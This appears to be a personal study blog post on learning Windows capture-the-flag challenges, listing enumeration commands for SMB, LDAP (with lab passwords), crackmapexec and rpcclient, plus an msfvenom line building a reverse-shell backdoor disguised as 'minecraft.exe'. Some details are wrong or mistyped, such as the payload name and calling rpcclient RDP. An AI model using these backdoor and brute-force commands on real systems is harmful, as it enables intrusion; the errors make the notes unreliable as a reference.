Learn CTF on windows

CTF

Created At : 2023-01-15 02:26

Count:740 Views 👀 :

How
How to search on google

How

I don’t like courses, if I don’t look for the information myself it’s not effective.
So I’m going to look for beginner’s articles, find the tools and read what it does on github.
While I read it, I will write it here and at the end on the day I will do a CTF on windows.

Let’s begin:

How to search on google

It’s not nessesary, but I would like to share how I do it.
it’s not amazing but I saw too many ppl who write the full sentence on google with uppercase, punctuation and potency formula…

How I do:

Few words (subject, verb):
- windows ctf writeup
- windows ctf boot to root
- boot to root windows
- writeur hack the box windows
We don’t care of the order of the words
Middle click on every links to open the in a new tab
Scroll very fast without reading on the first one, if I feel like it’s useless (ctrl+w)
You can also search for the word windows .

And there is the interesting links:

It’s enough, let’s start working.

Find sub domain

dig @$ip +short support.htp any

If you find somethign you have to white it in the /etc/hosts.

Samba

smbclient -N -L \\\\$IP

-L to list
-N to supress password prompt
It will work only if the guest login is ennabled.

Then :

smbclient -N \\\\$ip\\share

Now you can use ? to display the commands, I mainly use get, ls and dir.

To download all the files in a directory:

Smetimes mask is not needed.

SMB:> mask ""
SMB:> recurse ON
SMB:> prompt OFF
SMB:> mget *

Mount it:

mkdir /mnt/ctf
mount -t cifs //10.10.10.192/profiles$ /mnt/ctf

Exect an exe file on linux

With nono or wine64. I don’t know nono.
I don’t care about this step let’s continue.

LDAP Enumeration

He use ldapsearch but he only give one exemple so I’m searching somewhere else.
https://devconnected.com/how-to-search-ldap-using-ldapsearch-examples/
I will install it:

sudo pacman -S openldap

https://wiki.archlinux.org/title/OpenLDAP
https://access.redhat.com/documentation/en-us/red_hat_directory_server/11/html/administration_guide/examples-of-common-ldapsearches
https://0xdf.gitlab.io/tags#ldapsearch
Exemples

ldapsearch -H ldap://blackfield.local:389 -x -b DC=blackfield,DC=LOCAL

ldapsearch -h support.htb -x -s base namingcontexts

ldapsearch -h support.htb -x -b "DC=support,DC=htb"

ldapsearch -h support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"| less

# Without auth
ldapsearch -h 10.10.11.168 -x -s base namingcontexts


# With auth
ldapsearch -h 10.10.11.129 -D 'hope.sharp@search.htb' -w "IsolationIsKey?" -b "DC=search,DC=htb"

# I don't understand this one
ldapsearch -h 127.0.0.1 -x -b 'dc=htb' -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w 'J~42%W?PFHl]g'

crackmapexec

CrackMapExec shows the full OS information:


oxdf@parrot$ crackmapexec smb 10.10.10.248
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)

So, if the dig is not working you can use this, I think you should use both.
You can also see if the SMBv1 is enabled.

smbmap

I don’t see the difference with smbclient

Backdoor

https://www.youtube.com/watch?v=Nt0CE3Km8Nw
Targert = 192.168.5.115
me = 192.168.5.128

msfvenom -p windowd/meterpreter/reverse-tcp LHOST=$me LPORT=$myport -f exe > minecraft.exe

So, if you can upload something you can upload a backdoor.

rpcclient

it’s the RDP

Connect

rpcclient -U '' -N $IP

Enum users

enumdomusers

Clear the output:

cat users.txt | awk -F\[ '{print $2}' | awk -F \] '{print $1}' > valid_users.txt

Then in the CTF he use ldpsearch to find the password, decode it.

crackmapexec

Then he use the list of users to brute force the smb with the valid password and the tool crackmapexec.
I need it.

yay -S crackmapexec

wow, only for one tool…

Ok… I will install it later.
later:

yay -S crackmapexec --overwrite '*'

Then he brute force.
https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/

SharpHound

It’s used to enum for privesc